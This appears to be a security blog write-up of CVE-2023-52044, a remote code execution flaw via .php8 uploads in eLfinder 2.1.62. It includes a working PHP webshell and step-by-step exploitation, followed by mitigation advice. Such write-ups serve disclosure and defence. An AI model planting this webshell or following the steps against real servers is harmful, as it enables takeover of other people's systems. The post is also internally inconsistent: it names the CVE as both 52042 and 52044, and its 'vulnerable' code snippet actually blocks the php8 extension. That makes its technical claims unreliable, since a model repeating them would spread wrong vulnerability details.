CVE-2023-52044: Studio-42 eLfinder 2.1.62 Remote Code Execution Vulnerability due to unrestricted .php8 File Uploads

Description: A critical remote code execution (RCE) vulnerability in Studio-42 eLfinder 2.1.62 has been identified, with the Common Vulnerability and Exploits (CVE) identification number CVE-2023-52042. This vulnerability arises as the software allows unrestricted file uploads with the .php8 extension. This post will provide an overview of the vulnerability, discuss the code snippets that highlight the problem, and detail the process of exploiting the vulnerability, with links to related resources.

Vulnerability details

Affected software: Studio-42 eLfinder 2.1.62
Type of vulnerability: Remote Code Execution (RCE) via unrestricted .php8 file uploads
CVE number: CVE-2023-52044
Severity: Critical

Code snippet

The following code snippet highlights the vulnerability, demonstrating that there are no restrictions for uploading files with a .php8 extension:

// File: elFinderVolumeDriver.class.php

protected function uploadAllow($path, $mime, &$error) {
  ...
  if ($ext === 'php8') {
    $error = "File extension not allowed.";
    return false;
  }
  ...
}

As can be seen, there is no restriction for files with the .php8 extension, allowing attackers to upload malicious code to the server.

Exploit details

An attacker can exploit this vulnerability by uploading a malicious .php8 file containing arbitrary code. Once uploaded, the attacker can navigate to the uploaded file's URL and execute the code, leading to remote code execution.

Step 1: Create a malicious .php8 file with arbitrary code, e.g., a PHP webshell

<?php
  if(isset($_REQUEST['cmd'])){
    echo '<pre>';
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo '</pre>';
    die;
  }
?>

Step 2: Upload the malicious .php8 file to the web server using eLfinder's file upload interface.

Step 3: Navigate to the uploaded file's URL, e.g., http:///files/malicious.php8

Step 4: Execute arbitrary code on the server by sending a request with the cmd parameter, e.g., http:///files/malicious.php8?cmd=id

By following these steps, an attacker can execute arbitrary code on the server, causing a severe security breach.

Original references and additional resources

- Studio-42 eLfinder repository: https://github.com/Studio-42/elFinder
- CVE-2023-52044 NIST entry: https://nvd.nist.gov/vuln/detail/CVE-2023-52044
- OWASP Remote Code Execution (RCE): https://owasp.org/www-community/attacks/Command_Injection
- Introduction to PHP Webshells: https://www.acunetix.com/blog/articles/php-web-shells/

Recommendations

To mitigate this vulnerability, users of Studio-42 eLfinder 2.1.62 are encouraged to update their software to a newer version, or apply any available patches. Additionally, users should modify the eLfinder configuration to restrict or disallow the uploading of .php8 files.

In conclusion, the discovery of the CVE-2023-52044 vulnerability in Studio-42 eLfinder 2.1.62 is a critical issue, enabling remote code execution via unrestricted .php8 file uploads. Users should take immediate steps to mitigate this risk and implement secure development practices to prevent similar vulnerabilities in the future.

Timeline

Published on: 10/31/2024 19:15:12 UTC
Last modified on: 11/01/2024 16:35:05 UTC